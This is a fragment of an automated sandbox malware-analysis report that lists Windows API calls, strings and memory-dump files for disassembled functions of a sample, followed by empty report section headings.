Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0043D476, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87

APIs

_strncpy.LIBCMT ref: 0043D481
GetVolumeInformationA.KERNEL32(?,?,000000FF,?,?,?,?,000000FF), ref: 0043D4DF

Strings

\, xrefs: 0043D4A3

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00486D03, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83

APIs

Part of subcall function 00484F3E: RtlEnterCriticalSection.NTDLL(?), ref: 00484F76

Part of subcall function 00489FDA: __isleadbyte_l.LIBCMT ref: 0048A363
Part of subcall function 00489FDA: __cftof.LIBCMT ref: 0048A503
Part of subcall function 00489FDA: _strlen.LIBCMT ref: 0048A595
Part of subcall function 00489FDA: __aulldvrm.INT64 ref: 0048A8CC
Part of subcall function 00489FDA: __cftof.LIBCMT ref: 0048AA78

__ftbuf.LIBCMT ref: 00486DE8

Strings

8]J, xrefs: 00486DA9
8]J, xrefs: 00486D80

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004709E5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68

APIs

Part of subcall function 004145F0: __Stoull.NTSTC_LIBCMT ref: 00414670

Part of subcall function 00414740: GetCPInfo.KERNEL32(?,?), ref: 00414756

__itow.LIBCMT ref: 00470A4E

Strings

UTF-16, xrefs: 00470A92
UTF-8, xrefs: 00470A73

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00469630, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57window

APIs

GetMenuItemInfoA.USER32 ref: 0046965E
SetMenuItemInfoA.USER32(?,?,00000000,?), ref: 00469689

Part of subcall function 0045C710: GetMenu.USER32(?), ref: 0045C73C
Part of subcall function 0045C710: IsWindowVisible.USER32(?), ref: 0045C750
Part of subcall function 0045C710: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0045C772
Part of subcall function 0045C710: RedrawWindow.USER32(?,00000000,00000000,00000501), ref: 0045C789

Strings

0, xrefs: 0046964E

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0049441F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42

APIs

_UnwindNestedFrames.LIBCMT ref: 00494449

Part of subcall function 004936CB: RtlUnwind.KERNEL32(004936F6,004936F6,?,00000000), ref: 004936F1

Part of subcall function 00493E0F: __getptd.LIBCMT ref: 00493E36
Part of subcall function 00493E0F: __CallSettingFrame@12.LIBVCRUNTIME ref: 00493E82

Part of subcall function 00494072: __CreateFrameInfo.LIBCMT ref: 0049409A
Part of subcall function 00494072: __getptd.LIBCMT ref: 004940A4
Part of subcall function 00494072: __getptd.LIBCMT ref: 004940B2
Part of subcall function 00494072: __getptd.LIBCMT ref: 004940C0
Part of subcall function 00494072: __getptd.LIBCMT ref: 004940CB

Strings

csm, xrefs: 00494421
csm, xrefs: 0049442E, 00494443, 00494456, 00494474, 00494484

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004888F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,004A1768,00000008,004889FD,00000000,00000000,?,0048A041,00000100,004719BE,004011C4), ref: 00488906

Part of subcall function 00489727: __amsg_exit.LIBCMT ref: 00489749
Part of subcall function 00489727: RtlEnterCriticalSection.NTDLL(004011C4), ref: 00489751

InterlockedIncrement.KERNEL32(08498B00), ref: 00488947

Part of subcall function 00488539: InterlockedIncrement.KERNEL32(004011C4), ref: 0048854B
Part of subcall function 00488539: InterlockedIncrement.KERNEL32(753BFD70), ref: 00488558
Part of subcall function 00488539: InterlockedIncrement.KERNEL32(664815FF), ref: 00488565
Part of subcall function 00488539: InterlockedIncrement.KERNEL32(57187210), ref: 00488572
Part of subcall function 00488539: InterlockedIncrement.KERNEL32(0674FF85), ref: 0048857F
Part of subcall function 00488539: InterlockedIncrement.KERNEL32(0674FF85), ref: 0048859B
Part of subcall function 00488539: InterlockedIncrement.KERNEL32(004A6920), ref: 004885AB
Part of subcall function 00488539: InterlockedIncrement.KERNEL32(813C3902), ref: 004885C1

Strings

KERNEL32.DLL, xrefs: 00488901

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25clipboard

APIs

IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(00000001), ref: 00404096
Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040409C
Part of subcall function 00404080: GlobalUnWire.KERNEL32(00000000), ref: 0040410F
Part of subcall function 00404080: CloseClipboard.USER32 ref: 0040411B
Part of subcall function 00404080: GlobalFix.KERNEL32(00000000), ref: 00404136
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404194
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,00000000), ref: 004041BA
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404207
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,000003E7), ref: 0040422D

Strings

<<>>, xrefs: 0040101E

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004044D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22clipboard

APIs

GlobalUnWire.KERNEL32(00000000), ref: 004044DF
CloseClipboard.USER32 ref: 004044EC

Strings

GlobalLock, xrefs: 0040450D

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Networking:

Remote Access Functionality:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshots

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Static AutoHotKey Info

General

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 00450930, Relevance: 44.1, APIs: 17, Strings: 8, Instructions: 326
librarywindow

Function 00403AF0, Relevance: 38.9, APIs: 13, Strings: 9, Instructions: 432
sleepwindow

Function 004403A0, Relevance: 18.2, APIs: 12, Instructions: 217
window

Function 00440630, Relevance: 12.1, APIs: 8, Instructions: 148
file

Function 00415240, Relevance: 56.2, APIs: 22, Strings: 10, Instructions: 248
windowregistry

Function 0048C8C2, Relevance: 28.5, APIs: 15, Strings: 1, Instructions: 494
file